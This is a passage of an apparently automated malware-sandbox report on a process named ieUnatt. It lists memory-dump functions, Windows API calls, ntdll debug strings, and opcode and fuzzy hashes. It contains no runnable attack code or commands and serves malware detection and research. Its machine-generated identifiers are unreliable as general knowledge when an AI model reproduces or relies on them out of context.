                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,02D84434,000000F4), ref: 02D99E8C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                                              • Instruction ID: fffafe6efed2c7c41e5a40f02d265cd9b0e7754a551daedfb8efe5cb30cbd803
                                                                                                              • Opcode Fuzzy Hash: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                                              • Instruction Fuzzy Hash: F0E032B62042047FEA10EA68DC40E9B33ADEB89B10F004019FA08A7241D620BD108AB5
                                                                                                              Function 02D99E00 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(02D820B9,?,02D95E8F,02D820B9,02D95CCF,02D95E8F,?,02D820B9,02D95CCF,00001000,?,?,00000000), ref: 02D99E3C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                                              • Instruction ID: e190b4eb8a27d2d081fcb0eaf673cd7ccb3c1e7a54abca5e372cf76d00cfda8a
                                                                                                              • Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                                              • Instruction Fuzzy Hash: EAE06576204204BBDA10EE68DC40F9B33ADEF89B10F004418F908A7241DA31BE61CBB5
                                                                                                              Function 02D889D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02D889FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 73c06abc1a5872357217b733ae1be97597b77fa479ceb252f7eeff0ad9a7ae8c
                                                                                                              • Instruction ID: fc0484effe44a637b1cd5678730be14e1f34f06016dc027b1ba67d9301f4326e
                                                                                                              • Opcode Fuzzy Hash: 73c06abc1a5872357217b733ae1be97597b77fa479ceb252f7eeff0ad9a7ae8c
                                                                                                              • Instruction Fuzzy Hash: 61E0867125424867EB24BBA8EC45F76335C9B88B68F5846A0F91CDB3C1E678FE11E160
                                                                                                              Function 02D887C0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02D823B0,02D9860F,02D95CCF,02D82380), ref: 02D887F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 9be2c97a75a0baad5004be78a453f2c349cdf09b05c736c63d79afcd240c75b7
                                                                                                              • Instruction ID: e0799d7bcf52dc6d299fba4ec60187cc7cd9b2fd673cc1399fe26b240e049892
                                                                                                              • Opcode Fuzzy Hash: 9be2c97a75a0baad5004be78a453f2c349cdf09b05c736c63d79afcd240c75b7
                                                                                                              • Instruction Fuzzy Hash: C1D05E713803043BEA01F6F5DC86F5A329D9B40794F058164B94CEA3C1E954FA0046B9
                                                                                                              Function 02D8148B Relevance: 1.5, APIs: 1, Instructions: 20threadwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 02D8149D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1836367815-0
                                                                                                              • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                              • Instruction ID: 41363ae673da17118ea959d1b8a0be03d54f28ba1eaf21a7333cda5d6fc19fda
                                                                                                              • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                              • Instruction Fuzzy Hash: C9D0A732B4020C30EA2151945C42FFE7B6CCB41A41F004167FB08F51C1D680580A46B5
                                                                                                              Function 04EC2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: eb90c397723a5990a06be84d0c4b6b51d812d19446f2aeb0b0c80889db93d366
                                                                                                              • Instruction ID: 7a7cf41abdc7f022024fbd4358f081dd6776bb910dc44f16200fe53cce994b7a
                                                                                                              • Opcode Fuzzy Hash: eb90c397723a5990a06be84d0c4b6b51d812d19446f2aeb0b0c80889db93d366
                                                                                                              • Instruction Fuzzy Hash: 7EB09B75D015D5C5FB51F7604709B1779107BD0705F15D0A5E3530641E4739D1D2F175

                                                                                                              Non-executed Functions

                                                                                                              Function 051A04E8 Relevance: .1, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4015407659.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_51a0000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d386bb627630dbe32cc7d41eefeeae4b7758c1892456d2af03914b291bdce285
                                                                                                              • Instruction ID: 508044f285095114df757269c4cf55dc7714c59f7627033253fe831cdd12ca63
                                                                                                              • Opcode Fuzzy Hash: d386bb627630dbe32cc7d41eefeeae4b7758c1892456d2af03914b291bdce285
                                                                                                              • Instruction Fuzzy Hash: 5941E97561CB0D8FD369EF689085776B3E2FB89300F51462DD98AC3252EB70D8468785
                                                                                                              Function 051ADFCA Relevance: 57.7, Strings: 46, Instructions: 213COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4015407659.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_51a0000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                              • API String ID: 0-3754132690
                                                                                                              • Opcode ID: d0d2da888bc9bfe4dd4fd066b230f549b696502cb478700a218cebe9bdc33d47
                                                                                                              • Instruction ID: b42a3ecfa0f3c6c4297e61275817d67e42aac0d41f4c7d74bb55f281ee8d4fde
                                                                                                              • Opcode Fuzzy Hash: d0d2da888bc9bfe4dd4fd066b230f549b696502cb478700a218cebe9bdc33d47
                                                                                                              • Instruction Fuzzy Hash: 28914EF04082948AC7158F58A0652AFFFB5EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                                              Function 051A3C7D Relevance: 20.1, Strings: 16, Instructions: 64COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4015407659.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_51a0000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$c&-n$msmu$qsck$tqmq$umrx$vmsc$vpwm$vpwm
                                                                                                              • API String ID: 0-3311200144
                                                                                                              • Opcode ID: 0217cd2b48621ced41b2a264c866e23ac6367ed3c145a72057eedb05b82bda78
                                                                                                              • Instruction ID: 5f8404fa36e3b89502cfcf697e9066bd6e864a2e02c455ed04ac11995a7c1b8a
                                                                                                              • Opcode Fuzzy Hash: 0217cd2b48621ced41b2a264c866e23ac6367ed3c145a72057eedb05b82bda78
                                                                                                              • Instruction Fuzzy Hash: 483162B084474DDBCF25DF84DA827DDBB71FB01354F80A248E8096F254CBB68A54CB8A
                                                                                                              Function 04EC2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 8e3251e681ef3d03bfe75de854ca1609a3777d5c88d1b65149996dc70624bee9
                                                                                                              • Instruction ID: 1db2c6f6cbf2f485cbb9eb7dcaff458d9a87b7aff10c8ae29911492d7aa3a69f
                                                                                                              • Opcode Fuzzy Hash: 8e3251e681ef3d03bfe75de854ca1609a3777d5c88d1b65149996dc70624bee9
                                                                                                              • Instruction Fuzzy Hash: 5951FBB6F00116BFDB10DF988D8057EF7B8BB08208B14916DE559D7645E234FE01DBA0
                                                                                                              Function 04F32410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: aba55577402fc4486f4001f3fa577fd7f8b146ddffd55add5aaff690820014e7
                                                                                                              • Instruction ID: 6227b931932035a8946053750dbe486e074539b0a676736c4c384d79c7a94ac2
                                                                                                              • Opcode Fuzzy Hash: aba55577402fc4486f4001f3fa577fd7f8b146ddffd55add5aaff690820014e7
                                                                                                              • Instruction Fuzzy Hash: 1A510471E00645AFDB70DF9CC89097FB7F9EF44206B058499E896D7681E674FA01CB60
                                                                                                              Function 04EB7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04EF4655
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04EF4725
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04EF4742
                                                                                                              • Execute=1, xrefs: 04EF4713
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04EF4787
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04EF46FC
                                                                                                              • ExecuteOptions, xrefs: 04EF46A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 124b115bbd16e901bfcb8689c3151f2ad254a77b8e7c6fe905ab7087aa2e0291
                                                                                                              • Instruction ID: 3eeec9e703bc4c761da4960030de015b4e444eb1695f0100ce20de4c2f22737c
                                                                                                              • Opcode Fuzzy Hash: 124b115bbd16e901bfcb8689c3151f2ad254a77b8e7c6fe905ab7087aa2e0291
                                                                                                              • Instruction Fuzzy Hash: 5E5108316402196AEF25ABA4DC85FEF77A8EF84308F0414A9D945AB5D0E770BE419F90
                                                                                                              Function 04ECB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction ID: 9d962f88781eae06534e7b7ec7e1aa4c603f8e135bf40cac726e3ddf1d6cd152
                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction Fuzzy Hash: 9D81E470E452498EDF24CF68EA527FEBBB2AF45314F18661DE861A72D0C734B842CB50
                                                                                                              Function 04EAF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04EF02BD
                                                                                                              • RTL: Re-Waiting, xrefs: 04EF031E
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04EF02E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 40b868d8978b5fe0e1a475d37f70307278ff708a79f24e186b17571803b73b78
                                                                                                              • Instruction ID: fcdd347bc3e1b887d9218df184002f2df42bb9c620d000e0b3059fb0d412b426
                                                                                                              • Opcode Fuzzy Hash: 40b868d8978b5fe0e1a475d37f70307278ff708a79f24e186b17571803b73b78
                                                                                                              • Instruction Fuzzy Hash: A0E1C0306087419FE725CF28C884B6AB7E0BF88318F145A5DF5A58B2E1E774F855CB92
                                                                                                              Function 04EBBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04EF7B7F
                                                                                                              • RTL: Re-Waiting, xrefs: 04EF7BAC
                                                                                                              • RTL: Resource at %p, xrefs: 04EF7B8E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: e26f8bd7359c269799fa746f7ca8f32befac8c024258fe2c320bacb80792b6da
                                                                                                              • Instruction ID: 502af441385775b0a44edf129b13f802b59d582cdec26058f823803901c9bc5f
                                                                                                              • Opcode Fuzzy Hash: e26f8bd7359c269799fa746f7ca8f32befac8c024258fe2c320bacb80792b6da
                                                                                                              • Instruction Fuzzy Hash: BB41E4317057029FD724DE25CC40BABB7E6EF89714F001A1DE996DB680DB71F4058B91
                                                                                                              Function 04EBB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04EF728C
                                                                                                              Strings
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04EF7294
                                                                                                              • RTL: Re-Waiting, xrefs: 04EF72C1
                                                                                                              • RTL: Resource at %p, xrefs: 04EF72A3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: 1a0874b07a71603de6b75a46e622759d7cbb7c6ac4118a4c7860e2f986e86464
                                                                                                              • Instruction ID: ce6864078a5e0c472ce3de7edb2f9b14d6cda09cf0a683d33609a96b218fc90e
                                                                                                              • Opcode Fuzzy Hash: 1a0874b07a71603de6b75a46e622759d7cbb7c6ac4118a4c7860e2f986e86464
                                                                                                              • Instruction Fuzzy Hash: A341F471700202AFE724DE65CC41FAAB7A5FB84718F105619FE95EB680EB31F8528BD1
                                                                                                              Function 04F32300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: 5a188ebde15ff118c73f0bdd969e680365955b159ece78825b9cfda87ae52118
                                                                                                              • Instruction ID: 281cecec5cbe0344a930a93a1108287d7f192cc85074ebe54e724a29856910c1
                                                                                                              • Opcode Fuzzy Hash: 5a188ebde15ff118c73f0bdd969e680365955b159ece78825b9cfda87ae52118
                                                                                                              • Instruction Fuzzy Hash: 9E319872A002199FDB20DF29DC40BEE77F8EF44715F450595E849E3240EB30BA459FA1
                                                                                                              Function 04EC7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction ID: 209f928bf85bbd044eb75a40c9b516066e02b48df7f0b3a6370ba3e73bcfeb9b
                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction Fuzzy Hash: E1919271E0025BDEEB24DF69CA816BEB7A5BF44724F14651EE855E72C0E730A942CF20
                                                                                                              Function 04E89126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 1621ffc95cd91c604a8a4568f954fc04d2974dc54d0cc51f8c6fac9820561a39
                                                                                                              • Instruction ID: 7edbf73059de95ddc19835535b7dd65baa4c7bb21e38f043a20ee0f1625da39e
                                                                                                              • Opcode Fuzzy Hash: 1621ffc95cd91c604a8a4568f954fc04d2974dc54d0cc51f8c6fac9820561a39
                                                                                                              • Instruction Fuzzy Hash: 97811CB1D002699BDB359F54CD44BEEB6B8AB08714F0055EAAA1DB7240E7706E848FA0
                                                                                                              Function 04F0CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 04F0CFBD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallFilterFunc@8
                                                                                                              • String ID: @$@4Cw@4Cw
                                                                                                              • API String ID: 4062629308-3101775584
                                                                                                              • Opcode ID: 8d80f9d66d64b7fb1912daafd3f8f4510d97bd4071ca09a118c80cf32e6910c5
                                                                                                              • Instruction ID: d28affd66a211d89a0c12b8aae900c13fd77dd1a2a68ba6a72e17b4a876b2e27
